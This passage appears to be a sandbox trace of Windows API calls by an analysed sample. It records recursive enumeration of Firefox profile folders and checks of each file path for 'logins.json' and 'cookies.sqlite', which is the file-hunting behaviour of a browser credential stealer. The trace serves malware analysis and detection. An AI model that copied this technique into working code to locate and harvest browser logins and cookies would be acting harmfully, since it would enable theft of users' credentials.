lpAddress=0x926420, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.937] GetProcessHeap () returned 0x8e0000 [0160.937] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926420 | out: hHeap=0x8e0000) returned 1 [0160.937] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb66495d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb66495d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xc3a63b40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="webappsstore.sqlite", cAlternateFileName="WEBAPP~1.SQL")) returned 1 [0160.937] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.937] lstrlenW (lpString="\\") returned 1 [0160.937] GetProcessHeap () returned 0x8e0000 [0160.937] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x926360 [0160.937] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.937] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.937] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.937] lstrlenW (lpString="webappsstore.sqlite") returned 19 [0160.937] GetProcessHeap () returned 0x8e0000 [0160.937] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd8) returned 0x926420 [0160.937] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.937] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="webappsstore.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite" [0160.937] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.937] GetProcessHeap () returned 0x8e0000 [0160.937] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0160.937] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite", lpSrch="logins.json") returned 0x0 [0160.937] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite", lpSrch="cookies.sqlite") returned 0x0 [0160.937] VirtualQuery (in: lpAddress=0x926420, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.937] GetProcessHeap () returned 0x8e0000 [0160.937] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926420 | out: hHeap=0x8e0000) returned 1 [0160.937] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb66495d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb66495d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xc3a63b40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="webappsstore.sqlite", cAlternateFileName="WEBAPP~1.SQL")) returned 0 [0160.937] FindClose (in: hFindFile=0x8f9a40 | out: hFindFile=0x8f9a40) returned 1 [0160.938] VirtualQuery (in: lpAddress=0x923cd8, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x923000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x25000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.938] GetProcessHeap () returned 0x8e0000 [0160.938] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x923cd8 | out: hHeap=0x8e0000) returned 1 [0160.938] VirtualQuery (in: lpAddress=0x923c20, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x923000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x25000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.938] GetProcessHeap () returned 0x8e0000 [0160.938] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x923c20 | out: hHeap=0x8e0000) returned 1 [0160.938] VirtualQuery (in: lpAddress=0x912cb0, lpBuffer=0x2df9a4, dwLength=0x1c | out: lpBuffer=0x2df9a4*(BaseAddress=0x912000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x36000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.938] GetProcessHeap () returned 0x8e0000 [0160.938] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x912cb0 | out: hHeap=0x8e0000) returned 1 [0160.938] lstrlenW (lpString="Profile0") returned 8 [0160.938] VirtualQuery (in: lpAddress=0x922c18, lpBuffer=0x2df9a4, dwLength=0x1c | out: lpBuffer=0x2df9a4*(BaseAddress=0x922000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x26000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.938] GetProcessHeap () returned 0x8e0000 [0160.938] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x922c18 | out: hHeap=0x8e0000) returned 1 [0160.938] VirtualQuery (in: lpAddress=0x912e20, lpBuffer=0x2df9a4, dwLength=0x1c | out: lpBuffer=0x2df9a4*(BaseAddress=0x912000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x36000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.938] GetProcessHeap () returned 0x8e0000 [0160.938] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x912e20 | out: hHeap=0x8e0000) returned 1 [0160.938] VirtualQuery (in: lpAddress=0x912c10, lpBuffer=0x2df9a4, dwLength=0x1c | out: lpBuffer=0x2df9a4*(BaseAddress=0x912000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x36000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.938] GetProcessHeap () returned 0x8e0000 [0160.938] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x912c10 | out: hHeap=0x8e0000) returned 1 [0160.938] VirtualQuery (in: lpAddress=0x912b88, lpBuffer=0x2df9a4, dwLength=0x1c | out: lpBuffer=0x2df9a4*(BaseAddress=0x912000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x36000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.938] GetProcessHeap () returned 0x8e0000 [0160.938] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x912b88 | out: hHeap=0x8e0000) returned 1 [0160.938] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0160.938] lstrlenW (lpString="") returned 0 [0160.938] GetProcessHeap () returned 0x8e0000 [0160.938] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x7e) returned 0x926360 [0160.938] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0160.938] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0160.938] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0160.938] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0160.938] lstrlenW (lpString="*.*") returned 3 [0160.938] GetProcessHeap () returned 0x8e0000 [0160.938] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x84) returned 0x9263e8 [0160.938] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0160.938] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\*.*" [0160.939] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\*.*", lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb26740e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9a40 [0160.939] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0160.939] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb26740e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.939] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0160.939] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0160.939] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="Crash Reports", cAlternateFileName="CRASHR~1")) returned 1 [0160.939] lstrcmpiW (lpString1="Crash Reports", lpString2=".") returned 1 [0160.939] lstrcmpiW (lpString1="Crash Reports", lpString2="..") returned 1 [0160.939] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0160.939] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0160.939] lstrlenW (lpString="") returned 0 [0160.939] GetProcessHeap () returned 0x8e0000 [0160.939] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x7e) returned 0x926478 [0160.939] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0160.939] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0160.939] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0160.939] lstrlenW (lpString="Crash Reports") returned 13 [0160.939] GetProcessHeap () returned 0x8e0000 [0160.939] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x98) returned 0x912b88 [0160.939] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0160.939] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="Crash Reports" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports" [0160.939] VirtualQuery (in: lpAddress=0x926478, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.939] GetProcessHeap () returned 0x8e0000 [0160.939] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926478 | out: hHeap=0x8e0000) returned 1 [0160.939] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned 75 [0160.939] lstrlenW (lpString="") returned 0 [0160.939] GetProcessHeap () returned 0x8e0000 [0160.939] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x98) returned 0x926478 [0160.939] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports" [0160.939] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports" [0160.939] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned 75 [0160.939] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned 75 [0160.940] lstrlenW (lpString="\\*.*") returned 4 [0160.940] GetProcessHeap () returned 0x8e0000 [0160.940] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xa0) returned 0x912c28 [0160.940] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports" [0160.940] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*.*" [0160.940] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*.*", lpFindFileData=0x2df500 | out: lpFindFileData=0x2df500*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9a80 [0160.987] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0160.987] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df500 | out: lpFindFileData=0x2df500*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.987] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0160.987] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0160.987] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df500 | out: lpFindFileData=0x2df500*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xa, dwReserved0=0x0, dwReserved1=0x0, cFileName="InstallTime20131025151332", cAlternateFileName="INSTAL~1")) returned 1 [0160.987] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned 75 [0160.987] lstrlenW (lpString="\\") returned 1 [0160.987] GetProcessHeap () returned 0x8e0000 [0160.987] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x912cd0 [0160.987] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports" [0160.987] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\" [0160.987] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\") returned 76 [0160.988] lstrlenW (lpString="InstallTime20131025151332") returned 25 [0160.988] GetProcessHeap () returned 0x8e0000 [0160.988] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xcc) returned 0x8fce90 [0160.988] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\" [0160.988] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpString2="InstallTime20131025151332" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" [0160.988] VirtualQuery (in: lpAddress=0x912cd0, lpBuffer=0x2df4a8, dwLength=0x1c | out: lpBuffer=0x2df4a8*(BaseAddress=0x912000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x36000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.988] GetProcessHeap () returned 0x8e0000 [0160.988] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x912cd0 | out: hHeap=0x8e0000) returned 1 [0160.988] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332", lpSrch="logins.json") returned 0x0 [0160.988] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332", lpSrch="cookies.sqlite") returned 0x0 [0160.988] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df4b4, dwLength=0x1c | out: lpBuffer=0x2df4b4*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.988] GetProcessHeap () returned 0x8e0000 [0160.988] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0160.988] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df500 | out: lpFindFileData=0x2df500*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xa, dwReserved0=0x0, dwReserved1=0x0, cFileName="InstallTime20131025151332", cAlternateFileName="INSTAL~1")) returned 0 [0160.988] FindClose (in: hFindFile=0x8f9a80 | out: hFindFile=0x8f9a80) returned 1 [0160.988] VirtualQuery (in: lpAddress=0x912c28, lpBuffer=0x2df4b4, dwLength=0x1c | out: lpBuffer=0x2df4b4*(BaseAddress=0x912000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x36000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.988] GetProcessHeap () returned 0x8e0000 [0160.988] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x912c28 | out: hHeap=0x8e0000) returned 1 [0160.988] VirtualQuery (in: lpAddress=0x926478, lpBuffer=0x2df4b4, dwLength=0x1c | out: lpBuffer=0x2df4b4*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.988] GetProcessHeap () returned 0x8e0000 [0160.988] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926478 | out: hHeap=0x8e0000) returned 1 [0160.988] VirtualQuery (in: lpAddress=0x912b88, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x912000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x36000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.988] GetProcessHeap () returned 0x8e0000 [0160.988] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x912b88 | out: hHeap=0x8e0000) returned 1 [0160.988] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0160.988] lstrlenW (lpString="\\") returned 1 [0160.988] GetProcessHeap () returned 0x8e0000 [0160.988] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x80) returned 0x926478 [0160.988] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0160.989] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\" [0160.989] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\") returned 63 [0160.989] lstrlenW (lpString="Crash Reports") returned 13 [0160.989] GetProcessHeap () returned 0x8e0000 [0160.989] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x912b88 [0160.989] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS 